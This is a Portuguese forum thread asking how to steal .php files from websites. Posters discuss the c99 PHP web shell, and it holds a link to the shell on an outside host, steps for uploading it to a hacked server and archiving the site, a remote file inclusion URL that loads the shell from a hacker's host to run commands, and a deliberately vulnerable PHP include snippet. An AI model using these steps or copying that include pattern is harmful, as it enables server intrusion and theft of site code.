• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

skin

Roubar arquivos .php de um site

8 mensagens neste tópico

Eu li isto num fórum brasileiro e achei por bem trazer para aqui. Penso que isto não tem problemas de estar aqui, se tiver digam que eu elmino.

Isto é possivel de fazer?

vc precisa invadir de alguma forma o site

eu qndo entro num site

costumo usar essa cmd

http://bugs.275mb.com/c99.txt

vc coloca esse arquvio dentro do servidor e acessa ele

se tiver safe mode OFF

vc seleciona todos os arquivos e manda copiar

e depois clica em Pack buffer to archive

algo assim

e ai ele vai criar um arquivo .tar.gz

ai vc faz download do site completo

se quiser baixar apenas um arquivo..

eh soh clicar no link do download

mas vc precisa invadir o site de alguma forma

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Não vejo grande utilidade nisso

deve ser, mas como ele diz "é preciso invadir o site de alguma forma"

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

ao invadirmos o site ja n temos acesso ao mesmo? para que precisamos de um script para sacar os ficheiros? se ja hackamos o site, n é preciso script nenhum, basta sacar os files normalmente... penso eu...

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Eu não sei simplesmente encontrei isto e queria saber mais informações sobre o mesmo.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Há n forma de colocar um ficheiro num site. 1 delas é ter acesso ao site, outra é teres acesso a uma localização algures que te abre uma backdoor (que é o que o meu antivirus chamou a este script) para o servidor.

O objectivo deste ficheiro é colocá-lo num site que não seja teu, porque não estou a ver ninguem a querer abrir o próprio site para ser feito o download. Como o fazes, tem a haver com o teu sentido de responsabilidade e ética.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Ya, basta um formulário de upload, como os attachments nos fóruns por exemplo.

Mas quanto a esse script... então mesmo conseguindo enviar para o servidor, tendo ele a extensão .txt, qual é o perigo? O .txt não é executável. A não ser que sirva para interagir com um script local...

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

c99.txt é um ficheiro com código php que permite hackers efectuaram phpInjection em sites vulneraveis, o c99.txt permite o hacker atacar um site vulneravel e executar comandos no servidor onde o site vulneravel esta alojado, se a pasta public_html tiver a permissão 777 o hacker vai poder apagar, escrever e ler os ficheiros, (se não tiver a permissão 777 no dir public_html ele não pode sacar pode simplesmente ver o código) para sacar os ficheiros é preciso trocar as extensões dos ficheiros .php para .txt e sacar pela url ou então colocar num ficheiro .tar ou tar.gz ou zip ou rar e sacar pela url em forma de download normal.

Exemplo:

http://www.site_vulneravel.com/index.php?x=http://wwww.site_do_hacker.com/c99.txt?&xmd=id (Os comandos são executados onde esta bold)

EDIT: Criei uma bug num ficheiro.php para mostrar como é que esse script funciona

BUG:

<?php
include( $_GET['pagina'] );
?>

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora